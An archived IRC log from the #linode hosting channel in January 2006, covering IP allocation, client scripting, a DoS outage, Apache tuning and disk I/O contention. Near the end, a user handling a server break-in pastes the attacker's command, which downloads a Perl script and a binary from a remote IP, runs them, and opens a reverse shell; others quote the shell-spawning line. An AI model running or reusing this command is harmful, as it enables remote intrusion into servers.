Back to Home / #linode / 2006 / 01 / Prev Day | Next Day
#linode IRC Logs for 2006-01-24

---Logopened Tue Jan 24 00:00:56 2006
00:52|-|spr [~spr@c-24-10-236-93.hsd1.ut.comcast.net] has quit [Quit: Spoon!]
01:04|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has quit [Quit: Linux: Now with employee pricing!]
01:16|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has joined #linode
01:34|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has quit [Quit: Linux: Now with employee pricing!]
04:26|-|Dreamer3 [~dreamer3@0-1pool145-254.nas72.chicago3.il.us.da.qwest.net] has quit [Ping timeout: 480 seconds]
04:30|-|Dreamer3 [~dreamer3@0-1pool144-253.nas72.chicago3.il.us.da.qwest.net] has joined #linode
05:01|-|womble [~mpalmer@202.53.187.9] has joined #linode
05:18|-|harshy [~harshy@cpe-24-208-172-186.columbus.res.rr.com] has joined #linode
05:19|-|jekil [~alessandr@europa48.univ.trieste.it] has joined #linode
05:28|-|Nemesis__ [~nemesis@saturn.realmtech.net] has joined #linode
05:30<Nemesis__>io on host55 seems awfully sluggish..
05:54<Nemesis__>hm, looks like its fine now
06:06|-|Nemesis__ [~nemesis@saturn.realmtech.net] has quit [Quit: ]
06:35|-|The_Unknown_p [~The_Unkno@82-171-18-56.dsl.ip.tiscali.nl] has joined #linode
06:36<The_Unknown_p>Any administrator online? I've got a sales question
06:37<The_Unknown_p>maybe caker or mikegrb
06:41<internat>probably not here.. mind if i ask what the question is?
06:42<The_Unknown_p>no :)
06:42<The_Unknown_p>I want to hire a virtual dedicated server but need 20 IP addresses, expandable to 50 after a few weeks/months
06:44<The_Unknown_p>I don't know if they can supply me that, I didn't found an email address on the website when I visited it, internat
06:44<internat>ah
06:44<internat>yeah i think there are lmits on ips
06:44<internat>due to icaan restrictions
06:45<The_Unknown_p>yeah I know, I need them for an IRC application because soms IRC networks do not allow more than for example 5 connections from a single IP address
06:46<The_Unknown_p>I was hoping this is one of the bigger hosts with some subnets instead of those small hosting company's who only have 64IPs
06:55<internat>well most decent irc networks allow u to fill out an application to allow multipl connections
06:55<internat>linode has something liek 54hosts.. each host can have something like 10-20 computers.. each of them is allowed 2 ips before they ahve to start majorly justifying them
06:56<internat>so linode does have a lot in the way of ips, however u have to have a good reason for needing more then 2
06:56<internat>irc vhosts dont count
06:56<The_Unknown_p>I won't use it for vhosts, I don't even let my customers choose them
06:56<The_Unknown_p>but networks like Quakenet only allow 5 connections
06:56<internat>bet if u talk to the admins of the network they can fix that
06:56<The_Unknown_p>and they don't give commercial trusts anymore, and even for my own home, private use, I couldn't get an non-commercial one.
06:57<The_Unknown_p>Those admins @ quakenet think they're god or something :(
06:57<internat>dalnet is the same u can only have x ammount of connections before u get klined.. but u can apply for a lan cafe type thing
06:57<The_Unknown_p>I talked to them too much
06:57<The_Unknown_p>Thx for letting me know I"ll get a dalnet trust then at least.
06:58<The_Unknown_p>Lots of gamers use Quakenet, and because of my involvement in a gamehosting company some day, I got a lot of those users
06:58<internat>well then ur going to have to deal with quakenet officals
06:58<The_Unknown_p>You mean like paying?
06:58<The_Unknown_p>I already sent 100s of emails about that
06:59<The_Unknown_p>They do not have any official email address, only IRC support. You don't pass #help for an invite to #feds (where some real mods are) if you don't come up with some good story. And then #feds don't help you and sent you back
06:59<The_Unknown_p>Quakenet just sucks, I don't understand why people keep using it :(
06:59<internat>well im sure they have ppl that go thru the same lan cafe etc
07:00<The_Unknown_p>mmm if it's any kind of commercial you won't get it, if it's non-commercial, then you must have some luck to get one.
07:01<The_Unknown_p>some years ago they gave trusts, now it stopped. :( http://trustrequest.quakenet.org/
07:05<The_Unknown_p>well thx for your info bb
07:05|-|The_Unknown_p [~The_Unkno@82-171-18-56.dsl.ip.tiscali.nl] has quit [Quit: The_Unknown_p]
07:13|-|jekil [~alessandr@europa48.univ.trieste.it] has quit [Ping timeout: 480 seconds]
07:13|-|linville [~linville@nat-pool-rdu.redhat.com] has joined #linode
07:31|-|FireSlash [~FireSlash@0-3pool251-187.nas19.kansas-city2.mo.us.da.qwest.net] has joined #linode
07:34|-|tchgrl [~tchgrl@70.152.190.183] has joined #linode
08:15|-|tchgrl [~tchgrl@70.152.190.183] has quit [Read error: Connection reset by peer]
08:19<internat>anhone here use xchat aqua
08:24<taupehat>used to
08:25<internat>know how hard it is to script in it?
08:25<taupehat>simple
08:25<internat>is their instructions somewhere cause i cant find anything to savce myself
08:25<taupehat>tcl or perl - it's pretty agnostic
08:26<internat>]
08:26<taupehat>look in the directory it sits in for some examples
08:26<taupehat> /Applications/X-Chat Aqua/Plugins/ iirc
08:27<internat>nope no plugins
08:28<taupehat>odd
08:28<taupehat>did you lose the original download?
08:28<taupehat>I'e got a whole diretory in mine
08:29<internat>maybe i have a new version anyways ill reinstall
08:29<taupehat>heh
08:30<taupehat>copy the whole directory this time, not just the .app
08:30<internat>okies
08:30<internat>err.. wait
08:30<internat>how do i do that
08:30|-|FireSlash [~FireSlash@0-3pool251-187.nas19.kansas-city2.mo.us.da.qwest.net] has quit [Read error: Connection reset by peer]
08:30<taupehat>when you open the archive that xchat aqua comes in
08:30<taupehat>you have a folder
08:30<taupehat>drag that whole thing to /Applications
08:31<internat>ah
08:31|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has quit [Quit: Leaving]
08:32|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has joined #linode
08:33<taupehat>worky?
08:33<internat>yep
08:33<internat>i have plugins!
08:33<internat>ok so how do i exceute a plugin etc
08:33<taupehat>wewt
08:33<taupehat> /script load pluginname.pl
08:33<taupehat>or use the ooey-gooey
08:33<taupehat>I've become lazy since learning about irssi =]
08:34<internat>ok
08:34<internat>now i need to find examples :)
08:34<taupehat>what's in the plugins directory?
08:35<internat>nathan-frankishs-powerbook-g4-12:/Applications/X-Chat Aqua/Plugins root# ls
08:35<internat>google.pl perl-tiger.so ruby-1.8.so.tiger_only
08:35<internat>identd python.so rubyenv
08:35<internat>perl-panther.so ruby-1.6.so tcl.so
08:35<taupehat>so you've got a perl script in there...
08:35<internat>the google one yes
08:35<taupehat>then you have one example
08:35<internat>but that doesnt show me how to do events, like when u receive a msg do this
08:35<taupehat>there should be some documentation in the root of the xchataqua dir
08:36<internat>nope no documentation :/
08:38<taupehat>ok
08:38<taupehat>I'm off to shower
08:38<taupehat>good luck!
08:43|-|Redgore [~Redgore@195.38.75.118] has joined #linode
09:10|-|emcnabb [~emcnabb@adsl-69-238-24-205.dsl.scrm01.pacbell.net] has quit [Quit: IRC: Where men are men, women are men, and little girls are FBI agents]
09:29|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has joined #linode
09:56[~]caker engages ludacris speed
09:59|-|spr [~spr@ramona.cs.byu.edu] has joined #linode
10:06<internat>?
10:22|-|ericdes [~56ca0064@linode.com] has joined #linode
10:23|-|ericdes6 [~ericdes@AMontpellier-157-1-33-100.w86-202.abo.wanadoo.fr] has joined #linode
10:25|-|jekil [~alessandr@host116-236.pool8254.interbusiness.it] has joined #linode
10:27|-|ericdes [~56ca0064@linode.com] has quit [Quit: CGI:IRC (Ping timeout)]
10:40|-|ericdes6 [~ericdes@AMontpellier-157-1-33-100.w86-202.abo.wanadoo.fr] has quit [Quit: ericdes6]
11:09|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has quit [Read error: Operation timed out]
11:33|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has quit [Quit: Linux: Now with employee pricing!]
11:43|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has joined #linode
12:08<tronix>spaceballs reference :)
12:11|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has quit [Quit: This computer has gone to sleep]
12:24<npmr>http://www.financialexpress.com/latest_full_story.php?content_id=115514 <-- irc
12:43|-|wirehead [~40c091f3@linode.com] has joined #linode
12:43<wirehead>I can't reach host26
12:43<@mikegrb>yeah networking issues
12:43<besonen>i can't reach host9
12:43<@mikegrb>looks like a DOS
12:44|-|wferrel [~wferrel@typhoon.ferrel.org] has joined #linode
12:44<wirehead>Maaaan. Didn't we get rid of DOS in the 90s? :P
12:44<@mikegrb>network isn't out, just high packet loss
12:44<cmantito>hah
12:44<anderiv>just affecting HE, huh?
12:46|-|shrap [~42a30518@linode.com] has joined #linode
12:46[~]wferrel Checks channel logs, understands why he can't talk to host9.
12:46|-|MIXX941 [mixx941@stable.freebsdbox.net] has joined #linode
12:46<@caker>we're looking into it ...
12:47<besonen>wferrel: what do you see in the logs regarding host9?
12:47|-|galexand [~greg@12-210-119-29.client.insightBB.com] has joined #linode
12:47|-|Sh8d0w [~Shadow@user-119ap3p.biz.mindspring.com] has joined #linode
12:47<anderiv>besonen: 12:43 < wirehead> I can't reach host26
12:47<anderiv>12:43 <@mikegrb> yeah networking issues
12:47<anderiv>12:43 < besonen> i can't reach host9
12:47<anderiv>12:43 <@mikegrb> looks like a DOS
12:47<galexand>*sigh*
12:47<galexand>just not a good day to be an internet i guess
12:47<galexand>two of the three hosts i ever connect to are kaputt
12:47<besonen>bah
12:47|-|Guest593 [~artifex@artife.cx] has quit [Remote host closed the connection]
12:48<galexand>and the one that still works doesn't do me any good without email access *sigh*
12:48[~]galexand staples his hand to his forehead and sighs again
12:48|-|Artifex [~artifex@artife.cx] has joined #linode
12:48|-|mh [~d5544d58@linode.com] has joined #linode
12:48|-|mh changed nick to marcelh
12:49|-|psykoyiko [~psykoyiko@nomad.psax.org] has quit [Remote host closed the connection]
12:49|-|Artifex changed nick to Guest1768
12:49|-|Zymurgy [zymurgy@cat.delfax.net] has quit [Remote host closed the connection]
12:50|-|alex323 [alex@ool-4573a33d.dyn.optonline.net] has joined #linode
12:50<alex323>IS host9 down?
12:50<alex323>*Is
12:50<galexand>all of he is toasted
12:50|-|LazyGun [~3f624465@linode.com] has joined #linode
12:50<marcelh>i wanted to ask the same about host 20
12:50<LazyGun>heh...guess I'm not the first one here then :/
12:50<shrap>I dont know what host im on, but i cant connect to it :/
12:51<besonen>"Host Load" on my linode (host9) is pegged. does a DOS always peg the cpu?
12:51|-|Zymurgy [~zymurgy@cat.delfax.net] has joined #linode
12:52<LazyGun>i'm on 10...but can't ssh in either...guess it's a datacentre problem?
12:52<galexand>besonen, my suspicion is that the linode website can't contact host9 any more than we can...so whatever numbers it's showing are zany.
12:52|-|splee [~splee@82-68-159-62.dsl.in-addr.zen.co.uk] has joined #linode
12:52<alex323>64 bytes from alexwied.com (64.62.190.63): icmp_seq=311 ttl=53 time=95.1 ms
12:52<besonen>galexand: right
12:53<galexand>hey backness abounds.
12:53<splee>I was about to ask about connectivity issues, but I'm guessing they've already been flagged up?
12:53<splee>:)
12:53<besonen>maybe it's time to graduate linode.com to it's own datacenter?
12:53<alex323>I am getting pings now.
12:53<@mikegrb>alex323: yes, the hosts and linodes on them are still up, just networking
12:53<galexand>heh, but the dsl at the office is still toast *sigh*
12:53<alex323>mikegrb: Right.
12:53<cmantito>I find it entertaining when something happens and suddenly you just see people join join join join join
12:53<cmantito>hehe.
12:53<splee>well, it seems to have been resolved within the last minute
12:53<galexand>i haven't had a problem like this with he.net in months, and i'm interactive to this thing like 12 hours a day
12:54<wirehead>Maybe caker can set up a warning where if more than ___ people join the channel in a 5 minute period, he gets paged. :)
12:54<cmantito>haha
12:54<@mikegrb>wirehead: we were already paged
12:54<galexand>heh, i think it's that we've set up a scirpt so that when caker gets paged, we all join
12:54<galexand>some sort of emergent property
12:54<galexand>collective unconscious
12:55<cmantito>Teh Borg
12:55<cmantito>or Teh Replicators
12:55<cmantito>depending on what kind of fan you are ;)
12:55|-|psykoyiko [~psykoyiko@nomad.psax.org] has joined #linode
12:55|-|rko [~risto@dallas.kotalampi.com] has joined #linode
12:55<cmantito>,,and so it continues..
12:55<cmantito>s/,,/../
12:55<wirehead>Well, my linode is back and respondng.
12:55<alex323>Same.
12:55<splee>as is mine.
12:55<galexand>me2!!
12:56|-|galexand [~greg@12-210-119-29.client.insightBB.com] has quit [Quit: teh bored and teh online]
12:56<alex323>I hope HE gets that new DC running so I can upgrade my linode. :/
12:57|-|splee [~splee@82-68-159-62.dsl.in-addr.zen.co.uk] has quit [Quit: ]
12:58<wirehead>Okay, heading out.
12:58|-|wirehead [~40c091f3@linode.com] has quit [Quit: CGI:IRC]
13:00<shrap>wee mines working too
13:00<shrap>adios
13:00<LazyGun>well that was an exciting few minutes...
13:00|-|shrap [~42a30518@linode.com] has quit [Quit: CGI:IRC]
13:01|-|LazyGun [~3f624465@linode.com] has quit [Quit: back to sleep]
13:05|-|Sh8d0w [~Shadow@user-119ap3p.biz.mindspring.com] has left #linode []
13:08|-|jekil [~alessandr@host116-236.pool8254.interbusiness.it] has quit [Ping timeout: 480 seconds]
13:12|-|jekil [~alessandr@82.52.174.94] has joined #linode
13:12<linbot>New news from forums: ssh: connect to host linode.com port 22: Connection refused in Linux Networking <http://www.linode.com/forums/viewtopic.php?t=2063>
13:13|-|alex323 [alex@ool-4573a33d.dyn.optonline.net] has left #linode []
13:28|-|womble [~mpalmer@202.53.187.9] has quit [Quit: What's behind the round window...]
13:29<besonen>so, caker or mikegrb, was it a DOS at HE?
13:31|-|rafa [~rafa@tdev129-132.codetel.net.do] has joined #linode
13:34<@mikegrb>mmm cake
13:34<rafa>cake...mike?
13:35<anderiv>hehe
13:35<rafa>yummi
13:35|-|rafa [~rafa@tdev129-132.codetel.net.do] has left #linode []
13:35<anderiv>interesting
14:15|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has joined #linode
14:24|-|Newsome [~sorenson@216-190-206-130.customer.csolutions.net] has quit [Quit: Linux: Now with employee pricing!]
14:42<rko>here's a performance hint...
14:42<rko>if you're using Apache, upgrade to 2.2.0 and use option --with-mpm=worker
14:43<anderiv>rko: call me naive, but what advantage does the worker MPM have over prefork?
14:43<rko>that changes Apache to use threads and not forking, seems to have improved my performance quite a bit
14:43<rko>it can use your memory resources more efficiently I think
14:44<rko>maybe it doesn't matter in low volume environment so much
14:47<rko>but my server is getting 5000-6000 hits/hour... and most of them to php driven pages with db data
14:48<anderiv>rko: that's quite a bit more load than mine.
14:49<rko>now I'd like to know how to get spamassassin not to be such a memory hog...
14:50<anderiv>rko: hehe - good luck.
14:50<Battousai>rewrite it in black magic
14:50<rko>I know
14:56|-|Redgore [~Redgore@195.38.75.118] has quit [Quit: A geek without purpose - http://martlev.com | SMDC-Network IRC - irc.smdc-network.org]
14:56|-|Redgore [~Redgore@195.38.75.118] has joined #linode
14:59<fo0bar>rko: I thought things like php and mod_perl were still wonky when working with apache's threading mode
15:01[~]mikegrb was just going to say
15:03<rko>foobar, they claim 2.2.0 would be better
15:05<linbot>New news from forums: root access directly with ssh in Linux Networking <http://www.linode.com/forums/viewtopic.php?t=2064>
15:07<rko>oops, wait, they say mem_cache is now stable
15:07<rko>well, we'll see... so far it has been solid for 15 or so hours
15:27|-|Jackob [~Jackob@183.6.3.213.fix.bluewin.ch] has joined #linode
15:28<Jackob>what does it mean 100Mhz in virtual machine, is it so slow?... :)
15:30<encode>no, it means you have a guranteed minimum of 100MHz, depending on how much the host is being used, you may well be able to use the full 2x 3.2GHz power
15:31<Jackob>cool
15:31<Jackob>:)
15:31<Jackob>it's smth like VMware on the host machine probably
15:31<encode>its User Mode Linux
15:31<encode>or UML for short
15:32<Jackob>yup some time ago have reading about them.. xen, vserver, qemu one of them probably
15:35|-|Jackob [~Jackob@183.6.3.213.fix.bluewin.ch] has quit [Quit: Jackob]
15:39<besonen>looks like linode may actually have some competition. i just discovered quantact.com and enjoyed chatting in their irc channel with the admin timster. i haven't tested quantact's control panel but everything else looks good at first glance. they are all xen btw (xen 2 of course). also looks like quantact has chosen some fine hosts, sonic.net and coloserve.com/servepath.com.
15:39<besonen>btw, am i recalling correctly that contention ratios go away with xen?
15:40<@mikegrb>no, there will still be contention because there will be m ore then one linode on a host
15:40<@mikegrb>has quantact made a website yet or is it still a copy of linode.com with s/linode/quantact/g?
15:43<besonen>i guess you are familiar with them ;-) fwiw, quantact's website didn't remind me of linode's. but i suppose there are some similarities :-/
15:43<@mikegrb>heh, some
15:43<efudd>well, blue is better than green.
15:45<besonen>mikegrb: do you know timster?
15:45<@mikegrb>no
15:47<besonen>geez, it does look similar.
15:47<@mikegrb>yes
15:47<@mikegrb>the layout of pages is identical
15:47<@mikegrb>like the tabs and their contents and such
15:48<@mikegrb>they just changed the color and moved the col from the left to the right on the main page
15:48<besonen>how many admins does linode have these days?
15:48<@mikegrb>2
15:49<besonen>is it a full-time job for the both of you?
15:49<@mikegrb>yes
15:51<besonen>back to contention ratios. do you mean that we'll still be running uml on top of xen?
15:51<@mikegrb>no
15:53<@mikegrb>the contention ratio describes how many people are sharing the cpu
15:53<@mikegrb>since there will still be more then one linode on a host with xen, there will still be contention ratios
15:53<besonen>right. my memory is telling me is that xen in some way locks cpu resources so there isn't any contention. it would seem i grok contention ratios. is there some document you can point me to if you're too busy to explain?
15:53<besonen>i grok = i do not grok
15:54<@mikegrb>perhaps you are talking about context switching?
15:54<besonen>maybe
15:55<besonen>i don't know what i mean.
15:55[~]besonen googles xen "contention ratio"
15:58<besonen>is contention strictly a function of users/cpu?
15:58<besonen>i guess there can be disk contention issues too.
15:58<rko>heh, big time
15:58|-|linville [~linville@nat-pool-rdu.redhat.com] has quit [Quit: Leaving]
15:59<rko>that's where the resource bottle neck usuaully is, memory is constrained and it's causing swapping
16:00<rko>causing disk i/o rate limiting... you need to read all about io_tokens
16:02<@mikegrb>a linode invention
16:02<besonen>i suppose disk contention is rooted in the fact that ram is a scarcer resource than disk space?
16:03<@mikegrb>well, a lot of people don't properly configure stuff for running on their linode ram wise
16:03<@mikegrb>so they hit swap actively
16:03<rko>it's a result of memory being sliced to all users
16:03<rko>unlike CPU cycles, you don't get to use extra memory available
16:05<rko>I don't think it's an unique Linode idea though... Virtuozzo have similar thing called "beans"
16:06<Redgore>I know cakers code was submitted back to UML
16:06<@mikegrb>Redgore: not sure about that but the patch is available
16:06<@mikegrb>pretty sure it isn't in mainline uml
16:08<besonen>so io_tokens are intended to minimize disk contention? why can't contention be effectively eliminated? thanks for the mini-tutorial. gotta go. if you keep chatting about it i'll read what you wrote when i return.
16:08<@mikegrb>eliminating contention would mean each virtual server had it's own drive and io controller
16:09<@mikegrb>io_tokens minimize the effects of disk contention by ensuring everyone gets their fair share of disk io
16:14<Redgore>mikegrb: is the 120 thats available at HE ?
16:15<@mikegrb>doubtful but I'll check in a minute
16:15<Redgore>k
16:15<@mikegrb>have to check on a host right quick
16:17<@mikegrb>Redgore: nope, host52
16:18<Redgore>anything available there apart from an 80 ?
16:18<Redgore>I cant remember who is pointed at my linode
16:18<Redgore>and who is cnamed
16:22<anderiv>man - first HE and now TP? Anyone else having connectivity issues at TP?
16:22<Redgore>ill look into who is pointed at me and make sure they are cnamed, then ill be upgrading :)
16:23<@mikegrb>anderiv: yes, were on it
16:24<anderiv>mikegrb: thanks - I just saw your note re: host52.
16:24<@mikegrb>we're even
16:24<anderiv>I'm guessing that www.linode.com is hosted at TP, huh?
16:24|-|FireSlash [~FireSlash@0-1pool105-88.nas23.kansas-city2.mo.us.da.qwest.net] has joined #linode
16:25<Redgore>anderiv: its loading fine for me
16:25<Redgore>the site that is
16:25<anderiv>Redgore: fine here now too...
16:25|-|JasonF [~jay@cialis.oldos.org] has quit [Remote host closed the connection]
16:25|-|JasonF [~jay@cialis.oldos.org] has joined #linode
16:26|-|Redgore [~Redgore@195.38.75.118] has quit [Quit: A geek without purpose - http://martlev.com | SMDC-Network IRC - irc.smdc-network.org]
16:28|-|efudd [~jason@forever.broked.net] has quit [Ping timeout: 481 seconds]
16:29|-|cast [~cast@ppp128-172.lns2.adl2.internode.on.net] has joined #linode
16:30<cast>anyone else notice connection issues?
16:30<cast>appears stopped for now, but in the last 5 min things had a tendancy to not get through
16:33<@mikegrb>cast: yes, another linode in your datacenter was being targeted by a dos
16:33|-|JasonF [~jay@cialis.oldos.org] has quit [Ping timeout: 480 seconds]
16:34|-|jlinos [LinodeJava@86.120.236.54] has joined #linode
16:34<cast>guess as much :\
16:37|-|Dreamer3 [~dreamer3@0-1pool144-253.nas72.chicago3.il.us.da.qwest.net] has quit [Ping timeout: 480 seconds]
16:38|-|JasonF [~jay@cialis.oldos.org] has joined #linode
16:39|-|Dreamer3 [~dreamer3@0-1pool145-219.nas72.chicago3.il.us.da.qwest.net] has joined #linode
16:43|-|efudd [~jason@forever.broked.net] has joined #linode
16:49|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has joined #linode
16:49|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has quit [Quit: ]
16:52|-|internat [~internat@dsl-202-173-191-140.qld.westnet.com.au] has joined #linode
17:02|-|jlinos [LinodeJava@86.120.236.54] has quit [Quit: jlinos]
17:08|-|thoth39 [~hm@200216048126.user.veloxzone.com.br] has joined #linode
17:33<FireSlash>mikegrb, Did that include 46?
17:34<FireSlash>Just trying to see if the disconnect was a problem with my program or not :)
17:47|-|jekil [~alessandr@82.52.174.94] has quit [Read error: Connection reset by peer]
17:50|-|adamg [~misthos@zeus.misthos.com] has quit [Quit: ]
17:53|-|marcelh [~d5544d58@linode.com] has quit [Quit: CGI:IRC (Session timeout)]
18:01<tronix>besonen: disk I/O is kinda like a bathroom. Let's say there's five people and one bathroom in a three bedroom apartment.
18:01<tronix>most of the time, things are slow, so anyone can use the bathroom without anyone else needing it at the same time
18:01<tronix>but in the mornings...
18:01<tronix>five people, one bathroom. to eliminate that bathroom contention bottleneck,
18:02<tronix>you'd have to build five bathrooms. :)
18:02<tronix>or
18:02<tronix>you could set limits
18:02<tronix>like 20 mins max
18:02<tronix>not a perfect system, still some grumpy people
18:02<tronix>but at least you won't have someone hogging it with a 3 hour soak in the tub. ;)
18:03<tronix>bottom line: the i/o token mechanism works out pretty well for
18:03<tronix>doling out reasonable level of access to a shared resource.
18:03<tronix>it's also more cost effective to set some reasonable limits and share
18:04<tronix>than to dedicate/build a copy of a resource for everybody.
18:04<tronix>for some people, this shared hosting environment is not for them. that's all right. a dedicated one-user/one-server environment may be better for some
18:05<tronix>for quite a few others (like existing Linode customers), they're ok with the limitations and tradeoffs.
18:06<tronix>with all that said...
18:06<tronix>I can't wait for the Xenodes, though. :)
18:08<internat>bloody oath, its going to be good
18:09<internat>i wouldnt mind knowing what the replacement or equiv for io tokens is going to be tho
18:11|-|emcnabb [~emcnabb@adsl-69-238-24-205.dsl.scrm01.pacbell.net] has joined #linode
18:30|-|thoth39 [~hm@200216048126.user.veloxzone.com.br] has quit [Remote host closed the connection]
18:42<besonen>tronix: so contention is only wrt disk access? is cpu time less problematic when many folks say want to compile something?
18:45<@mikegrb>the cpu scheduler in the kernel does better then the io scheduler
18:48<besonen>how many disk controllers are there in each server linode runs?
18:49<cow>hrmmm
18:49<cow>someone's hacking into my server
18:50<cow>looks like they exploited something thru apache
18:50<besonen>what version of apache?
18:51<cow>2.x
18:51<cow>ill get u more etails soon
18:52<cow>http://219.84.105.36/ping.txt is the perl script it downloads
18:54<cow>mikegrb / caker... i guess someone is scanning the network for vulnerabilities
18:54<cow>ill get you ip addresses if you want
18:57<cow>grr
18:57<cow>this makes me angry
18:57<cow>now to look at 20 different logfiles
18:58[~]cast checks daily tw report
18:58<cow>it makes apache download a file
18:58<internat>it cant just make apache do it
18:58<internat>something else has been compromised to do that
18:58<cow>sh -c wget http://219.84.105.36/ping.txt;mv ping.txt temp2006;perl temp2006 140.118.107.51 3303;wget http://219.84.105.36/ping;chmod +x ping;./pi
18:58<cow>was executed under apache
18:59<cow>then it ran a bash shell somehow
18:59<cast>what php software ya run out of curiosity?
18:59<internat>are u runing phpbb or something like that?
18:59<cow>not phpbb
18:59<cow>but i have phpnuke, wordpress
18:59<cow>maybe others
18:59<@mikegrb>lolz
18:59<cow>i have too many vhosts...lol gonna look thru logs
18:59<cow>l\x94\x94ol
18:59<internat>so obviously someone got thru one of them :P
18:59<cow>yeh
19:00<cow>im supposed to leave to meet my gf in 35 minutes
19:00<cow>lets hope i make it
19:00<internat>hehe
19:00<@mikegrb>phpnuke and wordpress both have remote execute vulnerabilities
19:00<cow>dang
19:00<cow>even the newest versions\xC9
19:01<internat>*kicks wordpress* grr
19:01<internat>maybe i shouldnt run that then
19:01<cow>ironically, i was just upgrading wordpress to 2.0
19:01<cow>i wanna screw this guy over somehow
19:01<cow>but im too busy to figure out how to do it
19:02<cast>i dont know perl so forgicve me but..is http://219.84.105.36/ping.txt just a remote shell?
19:02<internat>nnot really
19:02<internat>it just downloads a script
19:02<internat>that script runs and does stuff
19:02<cow>well its kinda like a remote shell
19:02<cow>cause the person can just send commands
19:02<cast>well it ends in system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i");
19:03<cow>now i should scan for anything touched in the last few hours...
19:03<cow>argh
19:03<@mikegrb>yes that opens a remote shell
19:03|-|MrJohnK [~43895ce9@linode.com] has joined #linode
19:03<internat>now u should reinstall from scracth
19:03<@mikegrb>to the ip and port passed as arguments
19:03<cow>it didnt get root access i dont think...
19:04<internat>doesnt matter uve still been compromised
19:04<cow>how can i search the system for any files modified?
19:04<cast>cow: not yet anyway :) if i were you id block net access soon
19:04<cow>egh... too bad its running as a live server
19:04<internat>cause from memory if he installed a rootkit, u mightnt be able to see what he is doing
19:05<cow>hrmm
19:05<cow>there must be a way to see whats running
19:05<cow>i was basically watching the guy do it
19:06<cast>could ngrep the dudes little shell
19:06<cow>trying to figure out how ot stop it
19:06<internat>block everything in iptables and then log in via lish
19:06<cow>how would i do that?
19:07<cow>i just dropped any ip addresses he just tried to connect from
19:07<@mikegrb>or just "/etc/init.d/networking stop" or whatever your distributions equivalent is
19:07<internat>ifdown eth0 would probably work as well
19:07<cow>eh...
19:07<cow>bbs
19:07|-|cow [Ap0ll0@modemcable160.99-83-70.mc.videotron.ca] has quit [Quit: meow]
19:07|-|cow [Ap0ll0@modemcable160.99-83-70.mc.videotron.ca] has joined #linode
19:07<internat>decides to run chkrootkit
19:08<@mikegrb>lolz
19:08<internat>omg bindshell is infect! lol stupid port damm ssmtp
19:08<cow>20:01.31] <cow> bbs
19:08<cow>was the last thing i got
19:09<internat>internat decides to run chkrootkit
19:09<@mikegrb>lolz
19:09<internat> internat omg bindshell is infect! lol stupid port damm ssmtp
19:09<internat> mikegrb lolz
19:09<internat>bindshell always reports infected for 465 damm thing.. same with knocked cause its port listening
19:10<tronix>besonen: sorry, was typing up a trip report in another window
19:10<cow>thanks
19:10<cow>hrmmm
19:10<cow>any advice on what to do next?
19:10<tronix>besonen: i/o contention is really the biggest 'issue'; no mem contention as it's fixed-size for each UML instance
19:10<tronix>besonen: I don't really notice any CPU contention
19:10<tronix>besonen: other than it being kinda on the slow side (noticeable with tons of compiles with Gentoo) :-)
19:11<cast>cow: really depends how hot your gf is
19:11<@mikegrb>lolz
19:11<cow>LOL
19:11<cow>lol
19:11<cow>i just got off the phone with her... and got an invitation to look down her shirt all night...
19:12<cow>so what can i do in the next 20 minutes?
19:12<cow>hehe
19:12<cow>im gonna try chkrootkit
19:12<cow>but i dont think he got enough time to do any damage...
19:16<linbot>New news from forums: VNC in Linux Networking <http://www.linode.com/forums/viewtopic.php?t=2065>
19:17<besonen>cow: don't forget about your gf
19:18<besonen>oops, just noticed you haven't forgot ;-)
19:22|-|FireSlash [~FireSlash@0-1pool105-88.nas23.kansas-city2.mo.us.da.qwest.net] has quit [Quit: Leaving]
19:23|-|FireSlash [~FireSlash@0-1pool125-154.nas19.kansas-city2.mo.us.da.qwest.net] has joined #linode
19:23<JasonF>cow: turn off your linode, blame it on caker, and go screw your girl
19:23<JasonF>:)
19:24<cow>her friend is going to be there... i dont want her watching
19:25<cow>:P
19:25<cow>ah
19:25<cow>its from phpnuke
19:25<cow>i knew it
19:26<cow>its not showing up in the logs though... i looked for the "temp2006" file he renamed the ping.txt to and found it in the directory of a phpnuke installation
19:27<cow>do you think this is definitive proof that it was from the phpnuke installation?
19:27<cast>go look for phpnuke exploits
19:27<cast>i doubt he worked it out himself, its probably in their bug tracking system
19:30<cow>hrmm
19:30<cow>seems like it was either awstats (not sure if i have that installed) or xmlrpc.php that was hacked
19:31<cow>hrmm
19:31<cow>now i dont even know what to make of the log files...
19:34<besonen>seems like i've read about phpnuke security issues repeatedly.
19:34<JasonF>awstats had a nasty flaw recently
19:34<cow>so someone tried to exploit awstats
19:34<cow>it shows error code as 404 in the logs
19:34<internat>hmms maybe i wont install awstats then :/
19:35<@mikegrb>awstats has flaws every other month
19:35<internat>i need to come up with some way of tracking bandwidth for my virtual domains
19:35<@mikegrb>same with phpnuke
19:35<cow>but the remote shell program was found in the directory of phpnuke
19:35<cow>but i cant find any logs with phpnuke stuff that looks like it was being hacked...
19:35|-|thoth39 [~hm@200216048126.user.veloxzone.com.br] has joined #linode
19:36<thoth39>Anyone knowledgeable in Xen to tell me that, yes, a Xen guest kernel supports NPTL? :)
19:37<JasonF>slow, slow nptl emulation
19:37<@mikegrb>yes
19:37<@mikegrb>it has emulation
19:37<thoth39>Hum...
19:37<cow>is there a way to find out what the last ip address was used to log into bash? (does this even make sense?)
19:37<thoth39>So perhaps FC4 would work with it.
19:37<tronix>does FC4 work w/NPTL disabled? most distros do.
19:37<@mikegrb>cow: no, if you still have the shell running
19:37<JasonF>all fc4 packages are compiled nptl
19:37<tronix>ahhh
19:38<thoth39>LinuxThreads is being abandoned. Deprecated in FC4, won't be in FC5.
19:38<@mikegrb>cd to /proc/<process id>
19:38<thoth39>Is the public beta of Xen Linodes still going? I'd like to try this upgrade process and see what happens.
